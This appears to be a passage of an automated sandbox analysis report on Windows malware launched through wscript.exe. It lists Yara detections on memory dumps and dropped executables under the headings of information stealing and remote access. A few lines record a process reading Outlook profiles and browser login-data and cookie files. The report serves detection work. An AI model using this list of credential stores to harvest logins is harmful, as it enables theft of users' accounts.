Source: wscript.exe, 00000001.00000002.823061632.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.786905329.000001B742D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.710856543.000001B742E29000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match File source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.286506040.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.293804379.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.283509737.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.284654374.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED
Source: Yara match File source: 0000000C.00000002.799354104.0000010D37867000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.787481597.000001B744A45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.352632654.0000023E30CBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.787143262.000001B742DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.788512933.0000023E2EF2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.799045100.0000010D35F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309422158.000001A547DDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.787235102.000001A5460F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.787256308.000001A5460FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.790309780.0000023E30CBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.788499693.0000023E2EF22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.280726639.000001B744A4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.788030615.000001A547DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 7112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5232, type: MEMORYSTR
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Source: Yara match File source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.286506040.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.293804379.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.283509737.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.284654374.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED
Source: Yara match File source: 0000000C.00000002.799354104.0000010D37867000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.787481597.000001B744A45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.352632654.0000023E30CBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.787143262.000001B742DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.788512933.0000023E2EF2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.799045100.0000010D35F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309422158.000001A547DDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.787235102.000001A5460F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.787256308.000001A5460FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.790309780.0000023E30CBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.788499693.0000023E2EF22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.280726639.000001B744A4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.788030615.000001A547DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 7112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5232, type: MEMORYSTR